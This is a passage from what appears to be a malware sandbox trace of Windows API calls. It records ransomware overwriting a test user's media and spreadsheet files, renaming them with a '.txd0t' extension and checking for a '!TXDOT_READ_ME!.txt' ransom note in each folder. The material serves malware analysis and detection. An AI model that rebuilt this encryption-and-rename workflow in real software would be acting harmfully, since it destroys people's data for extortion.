hHeap=0xe30000) returned 1 [0072.521] CloseHandle (hObject=0x474) returned 1 [0072.523] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\s8RH8_.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\s8rh8_.mp3"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\s8RH8_.mp3.txd0t" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\s8rh8_.mp3.txd0t")) returned 1 [0072.557] SetEvent (hEvent=0x414) returned 1 [0072.557] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0073.005] StrCpyW (in: psz1=0x53ef7c0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\RwNhKXau 7hWtmS6.png" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\RwNhKXau 7hWtmS6.png") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\RwNhKXau 7hWtmS6.png" [0073.005] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\RwNhKXau 7hWtmS6.png", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\RwNhKXau 7hWtmS6.png.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\RwNhKXau 7hWtmS6.png.txd0t" [0073.005] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\RwNhKXau 7hWtmS6.png.txd0t") returned 0 [0073.005] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\RwNhKXau 7hWtmS6.png", dwFileAttributes=0x80) returned 1 [0073.006] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\RwNhKXau 7hWtmS6.png" (normalized: "c:\\users\\fd1hvy\\desktop\\rwnhkxau 7hwtms6.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0073.006] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=17088) returned 1 [0073.006] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.006] WriteFile (in: hFile=0x47c, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0073.007] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffffbb40, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.007] ReadFile (in: hFile=0x47c, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x42c0, lpNumberOfBytesRead=0x53ef780, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef780*=0x42c0, lpOverlapped=0x0) returned 1 [0073.007] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffffbd40, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.007] WriteFile (in: hFile=0x47c, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x42c0, lpNumberOfBytesWritten=0x53ef784, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef784*=0x42c0, lpOverlapped=0x0) returned 1 [0073.008] FlushFileBuffers (hFile=0x47c) returned 1 [0073.550] GetProcessHeap () returned 0xe30000 [0073.550] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x108) returned 0xe9d750 [0073.550] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\RwNhKXau 7hWtmS6.png" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\RwNhKXau 7hWtmS6.png") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\RwNhKXau 7hWtmS6.png" [0073.550] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\RwNhKXau 7hWtmS6.png") returned="RwNhKXau 7hWtmS6.png" [0073.550] StrCpyW (in: psz1=0xe9d788, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0073.550] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt") returned 1 [0073.550] GetProcessHeap () returned 0xe30000 [0073.550] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0073.550] CloseHandle (hObject=0x47c) returned 1 [0073.553] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\RwNhKXau 7hWtmS6.png" (normalized: "c:\\users\\fd1hvy\\desktop\\rwnhkxau 7hwtms6.png"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\RwNhKXau 7hWtmS6.png.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\rwnhkxau 7hwtms6.png.txd0t")) returned 1 [0073.553] SetEvent (hEvent=0x414) returned 1 [0073.553] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0073.557] StrCpyW (in: psz1=0x53ef7c0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\SJcMEwGL9beIVl4.wav" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\SJcMEwGL9beIVl4.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\SJcMEwGL9beIVl4.wav" [0073.557] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\SJcMEwGL9beIVl4.wav", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\SJcMEwGL9beIVl4.wav.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\SJcMEwGL9beIVl4.wav.txd0t" [0073.557] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\SJcMEwGL9beIVl4.wav.txd0t") returned 0 [0073.557] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\SJcMEwGL9beIVl4.wav", dwFileAttributes=0x80) returned 1 [0073.557] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\SJcMEwGL9beIVl4.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\sjcmewgl9beivl4.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0073.557] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=91974) returned 1 [0073.557] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.558] WriteFile (in: hFile=0x474, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0073.558] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffe96ba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.558] ReadFile (in: hFile=0x474, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x16740, lpNumberOfBytesRead=0x53ef780, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef780*=0x16740, lpOverlapped=0x0) returned 1 [0073.560] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffe98c0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.560] WriteFile (in: hFile=0x474, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x16740, lpNumberOfBytesWritten=0x53ef784, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef784*=0x16740, lpOverlapped=0x0) returned 1 [0073.560] FlushFileBuffers (hFile=0x474) returned 1 [0073.655] GetProcessHeap () returned 0xe30000 [0073.655] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x106) returned 0xe9d750 [0073.655] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\SJcMEwGL9beIVl4.wav" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\SJcMEwGL9beIVl4.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\SJcMEwGL9beIVl4.wav" [0073.655] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\SJcMEwGL9beIVl4.wav") returned="SJcMEwGL9beIVl4.wav" [0073.655] StrCpyW (in: psz1=0xe9d788, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0073.655] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt") returned 1 [0073.655] GetProcessHeap () returned 0xe30000 [0073.656] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0073.656] CloseHandle (hObject=0x474) returned 1 [0073.658] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\SJcMEwGL9beIVl4.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\sjcmewgl9beivl4.wav"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\SJcMEwGL9beIVl4.wav.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\sjcmewgl9beivl4.wav.txd0t")) returned 1 [0073.659] SetEvent (hEvent=0x414) returned 1 [0073.659] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0073.660] StrCpyW (in: psz1=0x53ef7b0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\8_rlQ cdl 6S_NtQ4.ods" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\8_rlQ cdl 6S_NtQ4.ods") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\8_rlQ cdl 6S_NtQ4.ods" [0073.660] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\8_rlQ cdl 6S_NtQ4.ods", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\8_rlQ cdl 6S_NtQ4.ods.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\8_rlQ cdl 6S_NtQ4.ods.txd0t" [0073.660] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\8_rlQ cdl 6S_NtQ4.ods.txd0t") returned 0 [0073.660] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\8_rlQ cdl 6S_NtQ4.ods", dwFileAttributes=0x80) returned 1 [0073.661] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\8_rlQ cdl 6S_NtQ4.ods" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\8_rlq cdl 6s_ntq4.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0073.661] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=93186) returned 1 [0073.661] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.661] WriteFile (in: hFile=0x474, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0073.662] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffe91fe, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.662] ReadFile (in: hFile=0x474, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x16c00, lpNumberOfBytesRead=0x53ef770, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef770*=0x16c00, lpOverlapped=0x0) returned 1 [0073.664] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffe9400, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.664] WriteFile (in: hFile=0x474, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x16c00, lpNumberOfBytesWritten=0x53ef774, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef774*=0x16c00, lpOverlapped=0x0) returned 1 [0073.664] FlushFileBuffers (hFile=0x474) returned 1 [0073.667] GetProcessHeap () returned 0xe30000 [0073.667] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x116) returned 0xed1330 [0073.667] StrCpyW (in: psz1=0xed1330, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\8_rlQ cdl 6S_NtQ4.ods" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\8_rlQ cdl 6S_NtQ4.ods") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\8_rlQ cdl 6S_NtQ4.ods" [0073.667] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\8_rlQ cdl 6S_NtQ4.ods") returned="8_rlQ cdl 6S_NtQ4.ods" [0073.667] StrCpyW (in: psz1=0xed1374, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0073.667] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\!TXDOT_READ_ME!.txt") returned 1 [0073.671] GetProcessHeap () returned 0xe30000 [0073.671] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed1330 | out: hHeap=0xe30000) returned 1 [0073.671] CloseHandle (hObject=0x474) returned 1 [0073.673] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\8_rlQ cdl 6S_NtQ4.ods" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\8_rlq cdl 6s_ntq4.ods"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\8_rlQ cdl 6S_NtQ4.ods.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\8_rlq cdl 6s_ntq4.ods.txd0t")) returned 1 [0073.674] SetEvent (hEvent=0x414) returned 1 [0073.674] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0073.724] StrCpyW (in: psz1=0x53ef7b0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\9JP3XV6aItTN8Fsv.gif" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\9JP3XV6aItTN8Fsv.gif") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\9JP3XV6aItTN8Fsv.gif" [0073.724] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\9JP3XV6aItTN8Fsv.gif", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\9JP3XV6aItTN8Fsv.gif.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\9JP3XV6aItTN8Fsv.gif.txd0t" [0073.724] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\9JP3XV6aItTN8Fsv.gif.txd0t") returned 0 [0073.724] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\9JP3XV6aItTN8Fsv.gif", dwFileAttributes=0x80) returned 1 [0073.725] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\9JP3XV6aItTN8Fsv.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\9jp3xv6aittn8fsv.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0073.725] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=71053) returned 1 [0073.725] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.725] WriteFile (in: hFile=0x474, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0073.726] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffee873, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.726] ReadFile (in: hFile=0x474, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x11580, lpNumberOfBytesRead=0x53ef770, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef770*=0x11580, lpOverlapped=0x0) returned 1 [0073.727] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffeea80, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.727] WriteFile (in: hFile=0x474, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x11580, lpNumberOfBytesWritten=0x53ef774, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef774*=0x11580, lpOverlapped=0x0) returned 1 [0073.728] FlushFileBuffers (hFile=0x474) returned 1 [0073.734] GetProcessHeap () returned 0xe30000 [0073.734] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x114) returned 0xed16a8 [0073.734] StrCpyW (in: psz1=0xed16a8, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\9JP3XV6aItTN8Fsv.gif" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\9JP3XV6aItTN8Fsv.gif") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\9JP3XV6aItTN8Fsv.gif" [0073.734] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\9JP3XV6aItTN8Fsv.gif") returned="9JP3XV6aItTN8Fsv.gif" [0073.734] StrCpyW (in: psz1=0xed16ec, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0073.734] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\!TXDOT_READ_ME!.txt") returned 1 [0073.735] GetProcessHeap () returned 0xe30000 [0073.735] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed16a8 | out: hHeap=0xe30000) returned 1 [0073.735] CloseHandle (hObject=0x474) returned 1 [0073.737] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\9JP3XV6aItTN8Fsv.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\9jp3xv6aittn8fsv.gif"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\9JP3XV6aItTN8Fsv.gif.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\9jp3xv6aittn8fsv.gif.txd0t")) returned 1 [0073.737] SetEvent (hEvent=0x414) returned 1 [0073.737] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0073.742] StrCpyW (in: psz1=0x53ef7b0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\aNP_CKGono8FHP.bmp" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\aNP_CKGono8FHP.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\aNP_CKGono8FHP.bmp" [0073.742] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\aNP_CKGono8FHP.bmp", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\aNP_CKGono8FHP.bmp.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\aNP_CKGono8FHP.bmp.txd0t" [0073.742] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\aNP_CKGono8FHP.bmp.txd0t") returned 0 [0073.742] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\aNP_CKGono8FHP.bmp", dwFileAttributes=0x80) returned 1 [0073.742] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\aNP_CKGono8FHP.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\anp_ckgono8fhp.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0073.743] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=54423) returned 1 [0073.743] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.743] WriteFile (in: hFile=0x468, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0073.743] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffff2969, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.744] ReadFile (in: hFile=0x468, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0xd490, lpNumberOfBytesRead=0x53ef770, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef770*=0xd490, lpOverlapped=0x0) returned 1 [0073.745] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffff2b70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.745] WriteFile (in: hFile=0x468, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0xd490, lpNumberOfBytesWritten=0x53ef774, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef774*=0xd490, lpOverlapped=0x0) returned 1 [0073.745] FlushFileBuffers (hFile=0x468) returned 1 [0073.750] GetProcessHeap () returned 0xe30000 [0073.750] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x110) returned 0xed2788 [0073.750] StrCpyW (in: psz1=0xed2788, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\aNP_CKGono8FHP.bmp" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\aNP_CKGono8FHP.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\aNP_CKGono8FHP.bmp" [0073.750] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\aNP_CKGono8FHP.bmp") returned="aNP_CKGono8FHP.bmp" [0073.750] StrCpyW (in: psz1=0xed27cc, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0073.750] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\!TXDOT_READ_ME!.txt") returned 1 [0073.750] GetProcessHeap () returned 0xe30000 [0073.750] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed2788 | out: hHeap=0xe30000) returned 1 [0073.750] CloseHandle (hObject=0x468) returned 1 [0073.752] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\aNP_CKGono8FHP.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\anp_ckgono8fhp.bmp"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\aNP_CKGono8FHP.bmp.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\anp_ckgono8fhp.bmp.txd0t")) returned 1 [0073.752] SetEvent (hEvent=0x414) returned 1 [0073.752] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0073.756] StrCpyW (in: psz1=0x53ef7c0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\I0Kapz95f.avi" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\I0Kapz95f.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\I0Kapz95f.avi" [0073.756] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\I0Kapz95f.avi", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\I0Kapz95f.avi.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\I0Kapz95f.avi.txd0t" [0073.756] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\I0Kapz95f.avi.txd0t") returned 0 [0073.756] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\I0Kapz95f.avi", dwFileAttributes=0x80) returned 1 [0073.759] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\I0Kapz95f.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\i0kapz95f.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0073.759] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=86567) returned 1 [0073.759] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.759] WriteFile (in: hFile=0x46c, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0073.760] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffeabd9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.760] ReadFile (in: hFile=0x46c, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x15220, lpNumberOfBytesRead=0x53ef780, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef780*=0x15220, lpOverlapped=0x0) returned 1 [0073.761] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffeade0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.761] WriteFile (in: hFile=0x46c, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x15220, lpNumberOfBytesWritten=0x53ef784, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef784*=0x15220, lpOverlapped=0x0) returned 1 [0073.762] FlushFileBuffers (hFile=0x46c) returned 1 [0073.771] GetProcessHeap () returned 0xe30000 [0073.771] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x106) returned 0xe9d750 [0073.771] 